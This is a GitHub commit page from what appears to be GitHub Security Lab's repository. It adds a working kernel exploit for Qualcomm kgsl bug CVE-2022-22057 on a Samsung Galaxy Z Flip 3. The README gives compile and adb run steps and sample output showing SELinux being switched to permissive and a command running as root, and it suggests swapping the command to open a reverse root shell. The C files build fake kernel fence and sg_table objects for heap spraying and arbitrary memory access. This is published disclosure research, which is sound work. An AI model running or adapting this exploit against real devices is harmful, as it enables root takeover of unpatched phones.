8000 Initial commit · github/securitylab@faaa312 · GitHub
[go: up one dir, main page]

Skip to content

Commit faaa312

Browse files
committed
Initial commit
1 parent d74e9de commit faaa312

16 files changed

+2244
-0
lines changed
Lines changed: 87 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,87 @@
1+
## Exploit for Qualcomm CVE-2022-22057
2+
3+
The write up can be found [here](https://github.blog/2022-06-16-the-android-kernel-mitigations-obstacle-race/). This is a bug in the Qualcomm kgsl driver that I reported in November 2021. The bug can be used to gain arbitrary kernel memory read and write from the untrusted app domain, which is then used to disable SELinux and gain root.
4+
5+
The exploit is tested on the Samsung Galaxy Z Flip 3 (European version SM-F711B) with firmware version F711BXXS2BUL6, Baseband F711BXXU2BUL4 and Kernel version 5.4.86-qgki-23063627-abF711BXXS2BUL6 (EUX region). The offsets in the exploit refer to that version of the firmware. Apart from the usual offsets in the kernel image, various addresses of the ion memory pools in `ion_utils.c` are also firmware specific. For reference, I used the following command to compile with clang in ndk-21:
6+
7+
```
8+
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -O2 timeline_wait.c sendmsg_spray.c signalfd_spray.c cpu_utils.c ion_utils.c fake_obj_util.c work_queue_utils.c -o timeline
9+
```
10+
11+
The exploit is reasonably reliable (~70% on tested device), although it does need to wait a few minutes after start up before running, as there are way too many broken/failed binder calls during the first few minutes of start up. (Not entirely sure whether it is a Qualcomm or Samsung problem)
12+
13+
To test, cross compile the file and then execute with `adb`:
14+
15+
```
16+
adb push timeline /data/local/tmp
17+
adb shell
18+
b2q:/ $ /data/local/tmp/timeline
19+
```
20+
21+
If succeeded, it will disable SELinux and run the `id` command as root and write the results in the `/data/local/tmp/id.txt` file:
22+
23+
```
24+
b2q:/ $ /data/local/tmp/timeline
25+
heap_id_mask 40
26+
ion region 0x75a0ccf000
27+
region start addr: ffffff8071800000
28+
fence kernel addr: ffffff8071fe0040 192
29+
created fake slab at ffffff8071840100
30+
[+] reallocation data initialized!
31+
[ ] initializing reallocation threads, please wait...
32+
[+] 40 reallocation threads ready!
33+
timeline_wait start
34+
readpipe start
35+
destroy start
36+
readpipe
37+
Caught signal: 10
38+
wait complete -1
39+
readpipe finished
40+
destroy finished
41+
cb_list ffffffc02d943bf8 temp ffffffc02d943c48
42+
mask 52424242 60
43+
cpu_id 0
44+
interval number 1
45+
mask 7f8e7bfeff 7
46+
thread number 0 7 20014
47+
thread batch number 0
48+
new mask 7f8e7bfeff ffffff8071840100
49+
region_offset 40100
50+
sprayed 1024 ion buffer
51+
start searching for buffer
52+
Found 7 ion regions
53+
heap_ops ffffffc012e17180, kernel base: a00b8000
54+
set enforcing to permissive
55+
[+] successfully overwritten selinux_enforcing
56+
wq_ptr_addr: ffffffc012dc2518
57+
wq_addr: ffffff81f4cf1200
58+
pwq_addr ffffff81e24ea100
59+
pool_addr ffffff805ff7c000
60+
worklist ffffff805ff7c020 ffffff805ff7c020
61+
queue work
62+
max_active 256 nr_active 0
63+
queuing work, waiting to aquire spin lock
64+
work_queued
65+
work processed
66+
complete 0
67+
ret 0
68+
nr_active 0
69+
worklist ffffff805ff7c020
70+
work next ffffff8071842c08
71+
[+] successfully run command and added id.txt in /data/local/tmp
72+
finished queue work
73+
freeing ion dma fd
74+
finished freeing ion dma fd
75+
finished spraying
76+
finished
77+
```
78+
There is a long pause after `wait complete -1` is printed, which should be less than a minute, this is normal. It can sometimes also take a while to queue the work (after `queuing work, waiting to aquire spin lock` is printed, can be a couple of minutes, just need to be patient, although that is not common). The exploit normally completes in a couple of minutes.
79+
80+
The file `/data/local/tmp/id.txt` should confirm that the command was run as root:
81+
82+
```
83+
b2q:/ $ cat /data/local/tmp/id.txt
84+
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
85+
```
86+
87+
A different command can be run by changing the variable `cmd` in `setup_sub_info` in `work_queue_utils.c`. (For example, to pop a reverse root shell).
Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
#ifndef ADDR_UTILS
2+
#define ADDR_UTILS
3+
4+
#define PHYS_TO_VIRT_OFF 0x8080000000ul
5+
6+
#define VMEMMAP 0xfffffffefde00000ul
7+
8+
#define KERNEL_PBASE 0xa0080000
9+
10+
#define KERNEL_VBASE 0xffffffc010080000ul
11+
12+
//_text - kernel physical base
13+
#define KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE)
14+
15+
static inline uint64_t page_align(uint64_t x) {
16+
return (x >> 12) << 12;
17+
}
18+
19+
static inline uint64_t phys_to_virt(uint64_t x) {
20+
return (uint64_t)(x) - PHYS_TO_VIRT_OFF;
21+
}
22+
23+
static inline uint64_t virt_to_phys_lm(uint64_t x) {
24+
if (x & (1ul << 38)) err(1, "address is not in low mem range.\n");
25+
return x + PHYS_TO_VIRT_OFF;
26+
}
27+
28+
static inline uint64_t virt_to_phys(uint64_t x) {
29+
if (x & (1ul << 38)) return x - (KERNEL_VBASE - KERNEL_PBASE);
30+
return x + PHYS_TO_VIRT_OFF;
31+
}
32+
33+
static inline uint64_t phys_to_page(uint64_t phys_addr) {
34+
//VMEMMAP interpreted as page pointer, so pfn needs to multiply by sizeof(struct page)
35+
return (phys_addr >> 12) * 64 + VMEMMAP;
36+
}
37+
38+
#endif
Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
#include <sys/syscall.h>
2+
#include <err.h>
3+
#include <errno.h>
4+
#include <stdio.h>
5+
#include <stdlib.h>
6+
#include <sched.h>
7+
#include <unistd.h>
8+
#include <string.h>
9+
10+
#include "cpu_utils.h"
11+
12+
#define CPU_SETSIZE 1024
13+
#define __NCPUBITS (8 * sizeof (unsigned long))
14+
typedef struct
15+
{
16+
unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
17+
} cpu_set_t;
18+
19+
#define CPU_SET(cpu, cpusetp) \
20+
((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
21+
#define CPU_ZERO(cpusetp) \
22+
memset((cpusetp), 0, sizeof(cpu_set_t))
23+
24+
int migrate_to_cpu(int i)
25+
{
26+
int syscallres;
27+
pid_t pid = gettid();
28+
cpu_set_t cpu;
29+
CPU_ZERO(&cpu);
30+
CPU_SET(i, &cpu);
31+
32+
syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
33+
if (syscallres)
34+
{
35+
return -1;
36+
}
37+
return 0;
38+
}
39+
40+
int check_cpu_affinity() {
41+
if (migrate_to_cpu(4) == -1) return 4;
42+
if (migrate_to_cpu(5) == -1) return 5;
43+
return -1;
44+
}
45+
Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
#ifndef CPU_UTILS
2+
#define CPU_UTILS
3+
4+
int migrate_to_cpu(int i);
5+
6+
int check_cpu_affinity();
7+
#endif
Lines changed: 120 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,120 @@
1+
#include "fake_obj_util.h"
2+
#include "addr_utils.h"
3+
4+
static uint64_t vaddr_offset = 0;
5+
6+
static inline uint64_t get_vaddr(struct list_head* ptr) {
7+
return (uint64_t)ptr + vaddr_offset;
8+
}
9+
10+
static void init_list_head(struct list_head *list)
11+
{
12+
list->next = get_vaddr(list);
13+
list->prev = get_vaddr(list);
14+
}
15+
16+
static void list_add(struct list_head *new, struct list_head *prev,
17+
struct list_head * start)
18+
{
19+
start->prev = get_vaddr(new);
20+
new->next = get_vaddr(start);
21+
new->prev = get_vaddr(prev);
22+
prev->next = get_vaddr(new);
23+
}
24+
25+
static uint64_t add_zero_filled_area(void* region, size_t offset) {
26+
memset(region + offset, 0, ZERO_FILL_SZ);
27+
return ZERO_FILL_SZ + offset;
28+
}
29+
30+
static struct list_head* get_list(struct kgsl_timeline_fence* fence) {
31+
return &fence->node;
32+
}
33+
34+
static void init_fence(struct kgsl_timeline_fence* fence, uint64_t zero_fill_addr, int check) {
35+
struct dma_fence* base = &fence->base;
36+
base->flags = 0;
37+
base->refcount = 0;
38+
if (check) {
39+
base->cb_list.next = 0x41414141;
40+
base->cb_list.prev = 0x42424242;
41+
42+
} else {
43+
init_list_head(&base->cb_list);
44+
}
45+
base->ops = zero_fill_addr;
46+
}
47+
48+
static uint64_t create_fake_fences(void* region, uint64_t offset, uint64_t chain_size, uint64_t zero_fill_addr) {
49+
struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)(region + offset);
50+
struct kgsl_timeline_fence* prev = start;
51+
struct list_head* start_list = get_list(start);
52+
struct list_head* prev_list = start_list;
53+
init_list_head(start_list);
54+
init_fence(start, zero_fill_addr, 0);
55+
offset += 128;
56+
for (uint64_t i = 1; i < chain_size; i++) {
57+
struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)(region + offset);
58+
struct list_head* curr_list = get_list(curr);
59+
init_list_head(curr_list);
60+
if (i == chain_size - 1) {
61+
init_fence(curr, zero_fill_addr, 0);
62+
} else {
63+
init_fence(curr, zero_fill_addr, 0);
64+
}
65+
list_add(curr_list, prev_list, start_list);
66+
prev = curr;
67+
prev_list = curr_list;
68+
offset += 128;
69+
}
70+
return offset;
71+
}
72+
73+
uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr) {
74+
if (sizeof(struct kgsl_timeline_fence) > 128) err(1, "kgsl_timeline_fence too big\n");
75+
if (chain_size < 2) err(1, "chain size should be greater than 1.\n");
76+
uint64_t fake_size = chain_size * 128 + ZERO_FILL_SZ;
77+
if (fake_size > region_size) err(1, "chain of fake objects does not fit into region.\n");
78+
uint64_t offset = (region_size - fake_size)/2;
79+
vaddr_offset = region_vaddr - (uint64_t)region;
80+
uint64_t zero_fill_addr = region_vaddr + offset;
81+
offset = add_zero_filled_area(region, offset);
82+
uint64_t out = offset;
83+
offset = create_fake_fences(region, offset, chain_size, zero_fill_addr);
84+
return out;
85+
}
86+
87+
uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t fence_kstart) {
88+
struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)fence_start;
89+
struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)fence_start;
90+
struct dma_fence* base = &curr->base;
91+
base->flags = 0;
92+
struct list_head* cb_list = &base->cb_list;
93+
if (cb_list->prev > (fence_kstart + chain_size * 128)) {
94+
struct list_head* node = get_list(curr);
95+
node->next = cb_list->prev + STACK_OFFSET;
96+
base->refcount = 0;
97+
base->flags = 1;
98+
return cb_list->prev;
99+
}
100+
return 0;
101+
}
102+
103+
void create_fake_sgtable(uint8_t* table_region, uint64_t table_vaddr, uint64_t phys_addr, size_t len) {
104+
struct sg_table* table = (struct sg_table*)table_region;
105+
table->nents = 1;
106+
table->orig_nents = 1;
107+
table->sgl = (struct scatterlist*)(table_vaddr + 128);
108+
struct scatterlist* sg = (struct scatterlist*)(table_region + 128);
109+
uint64_t page_link = phys_to_page(phys_addr);
110+
sg->page_link = page_link |= 0x2ul;
111+
sg->length = len;
112+
sg->offset = 0;
113+
}
114+
115+
void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size) {
116+
create_fake_sgtable(table_region, table_vaddr, (phys_addr >> 12) << 12, size);
117+
buffer->sg_table = (struct sg_table*)table_vaddr;
118+
buffer->size = size;
119+
}
120+
Lines changed: 92 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
#ifndef FAKE_OBJ_UTIL
2+
#define FAKE_OBJ_UTIL
3+
4+
#include <err.h>
5+
#include <errno.h>
6+
#include <fcntl.h>
7+
#include <stdio.h>
8+
#include <stdlib.h>
9+
#include <string.h>
10+
#include <sys/types.h>
11+
#include <unistd.h>
12+
13+
#define ZERO_FILL_SZ 128
14+
15+
#define STACK_OFFSET 0x50
16+
17+
//offset of node in kgsl_timeline_fence
18+
#define NODE_OFF 0x48
19+
20+
struct list_head {
21+
uint64_t next, prev;
22+
};
23+
24+
typedef struct {
25+
int counter;
26+
} atomic_t;
27+
28+
typedef struct refcount_struct {
29+
atomic_t refs;
30+
} refcount_t;
31+
32+
struct kref {
33+
refcount_t refcount;
34+
};
35+
36+
struct dma_fence {
37+
void *lock;
38+
uint64_t ops;
39+
union {
40+
struct list_head cb_list;
41+
int64_t timestamp;
42+
};
43+
uint64_t context;
44+
uint64_t seqno;
45+
unsigned long flags;
46+
uint32_t refcount;
47+
int error;
48+
};
49+
50+
struct kgsl_timeline_fence {
51+
struct dma_fence base;
52+
void *timeline;
53+
struct list_head node;
54+
};
55+
56+
struct scatterlist {
57+
unsigned long page_link;
58+
unsigned int offset;
59+
unsigned int length;
60+
uint64_t dma_address;
61+
unsigned int dma_length;
62+
};
63+
64+
struct sg_table {
65+
struct scatterlist *sgl; /* the list */
66+
unsigned int nents; /* number of mapped entries */
67+
unsigned int orig_nents; /* original size of list */
68+
};
69+
70+
struct ion_buffer {
71+
struct list_head list;
72+
void *heap;
73+
unsigned long flags;
74+
unsigned long private_flags;
75+
size_t size;
76+
void *priv_virt;
77+
uint8_t lock[32];
78+
int kmap_cnt;
79+
void *vaddr;
80+
struct sg_table *sg_table;
81+
struct list_head attachments;
82+
};
83+
84+
uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr);
85+
86+
uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t region_vaddr);
87+
88+
void fake_ion_heap(void* region);
89+
90+
void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size);
91+
92+
#endif

0 commit comments

Comments
 (0)
0